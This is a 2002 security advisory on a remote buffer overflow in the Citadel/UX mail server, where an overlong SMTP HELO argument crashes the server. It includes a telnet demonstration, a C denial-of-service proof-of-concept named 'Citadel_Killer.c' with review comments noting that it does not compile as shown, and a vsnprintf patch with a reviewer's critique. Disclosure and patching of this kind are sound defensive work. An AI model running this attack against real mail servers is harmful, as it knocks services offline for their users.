
Citadel/UX - remote buffer overflow leads to DoS



12th Mar 2002 [SBWID-5181]
COMMAND

	Citadel remote buffer overflow leads to DoS

SYSTEMS AFFECTED

	Citadel v5.90??

PROBLEM

	xperc posted :
	

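	An attacker can carry out a denial-of-service attack against Citadel by
	sending an overlong argument to the SMTP HELO command. Once the big buffer
	has been sent, the server is vulnerable. The patch under SOLUTION shows the
	cause: the text was formatted with vsprintf() into a 4096-byte buffer in
	sysdep.c with no length limit.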
	

	Example:
	

	[xperc@security citadel]$telnet 192.168.0.3 25

	Trying 192.168.0.3...

	Connected to 192.168.0.3.

	Escape character is '^]'.

	220 security ESMTP Citadel/UX server ready.

	helo [buffer]

	

	[buffer] is around 4096 characters.
	

	

	/* Citadel_Killer.c

	 *

	 * Remote Denial of Service Citadel/UX Server.  

	 * 

	 *		by xperc@hotmail.com

	 */

	#include <stdio.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	

	#define MAXBUF 		8000 

	#define MAXBUF2		MAXBUF+6

	#define RECVBUF		256

	#define CIT_SMTP	25	

	

	/*
	 * Proof-of-concept client for the HELO overflow described in this advisory.
	 * It opens a TCP/IPv4 connection to port CIT_SMTP (25) on the address given
	 * in argv[1], reads the server greeting, sends a single "helo" line whose
	 * argument is MAXBUF bytes of 'a', and closes the socket.
	 *
	 * Returns 0 after the send; calls exit(-1) on a usage, socket, connect or
	 * recv error.
	 *
	 * Defensive reading: the patch on this page bounds a vsprintf() into a
	 * char buf[4096] in sysdep.c, so any client text longer than that buffer
	 * overran it. A HELO argument of this size is far longer than a real host
	 * name and longer than the 512-octet SMTP command line limit, so it can be
	 * rejected or alerted on at the network edge as well as fixed in the server.
	 *
	 * NOTE(review): the listing is kept exactly as extracted (escaped quotes,
	 * hard-wrapped statements), so it does not compile as shown.
	 */
	int main(int argc, char *argv[])

	{

		int sockfd;

		char msg[RECVBUF],buf[MAXBUF],sendbuf

	[MAXBUF2];

		struct sockaddr_in target;

	

		/* Exactly one command-line argument is expected: the target address. */
		if(argc!=2){

			fprintf(stderr,\"Usage: %s 

	target_address\\n\",*argv);

			exit(-1);

		}

		/* Stream (TCP) socket over IPv4. */
		if((sockfd=socket

	(AF_INET,SOCK_STREAM,0))<0){

			perror(\"socket\");

			exit(-1);

		}

		/*
		 * NOTE(review): target is not zeroed before its fields are assigned and
		 * the inet_addr() result is not checked, so an unparsable address is not
		 * rejected at this point.
		 */
		target.sin_family=AF_INET;

		target.sin_port=htons(CIT_SMTP);

		target.sin_addr.s_addr=inet_addr(argv[1]);

		if(connect(sockfd,(struct sockaddr*)

	&target,sizeof(target))<0){

			perror(\"connect\");

			exit(-1);	

		}

		/*
		 * Wait for the server greeting (the "220 ..." line in the transcript).
		 * msg is not read again after this call.
		 */
		if(recv(sockfd,msg,sizeof(msg)-1,0)<=0){

			perror(\"recv\");

			exit(-1);

		}

	

		/*
		 * Fill all MAXBUF bytes of buf with 'a'.
		 * NOTE(review): buf is left without a terminating NUL, so the %s
		 * conversion below reads past the end of buf; only the sizeof(sendbuf)
		 * limit passed to snprintf stops the copy.
		 */
		memset(buf,\'a\',MAXBUF);

		snprintf(sendbuf,sizeof(sendbuf),\"helo %

	s\",buf);

		/*
		 * NOTE(review): assuming the wrapped format string is "helo %s", sendbuf
		 * already holds 5 + MAXBUF characters plus the NUL, i.e. all MAXBUF2
		 * bytes, so this strcat writes one byte past the end of sendbuf.
		 */
		strcat(sendbuf,\"\\n\");

	

		/* The send() result is ignored and no reply is read before closing. */
		send(sockfd,sendbuf,strlen(sendbuf),0);

		close(sockfd);

	

		return 0;

	}

	

	

SOLUTION

	Patch for this Vulnerability:
	

	--- citadel-old/sysdep.c	Sat Dec  8 12:31:44 

	2001

	+++ citadel/sysdep.c	Sat Mar  9 05:51:11 

	2002

	@@ -106,7 +106,7 @@

	 	char buf[4096];

	   

	         va_start(arg_ptr, format);   

	-        vsprintf(buf, format, arg_ptr);   

	+        vsnprintf(buf, sizeof(buf), format, arg_ptr);   

	         va_end(arg_ptr);   

	 

	 	if (loglevel <= verbosity) { 
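Review bot: The return value of the added `vsnprintf(buf, sizeof(buf), format, arg_ptr);` is discarded, so a message longer than the 4096-byte `buf` is now cut off silently and the log gives no sign that a client sent an oversized line. Keeping the result, e.g. `int n = vsnprintf(buf, sizeof(buf), format, arg_ptr);` followed by `if (n < 0 || (size_t)n >= sizeof(buf)) { /* flag the entry as truncated */ }`, would make such requests visible to whoever reads the log. The bound also protects only this one buffer; the advisory's overlong HELO argument presumably still passes through the SMTP command handling, which is not part of this hunk, so a length limit at that input boundary is worth checking. The enclosing function starts and ends outside the hunk.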

	

	

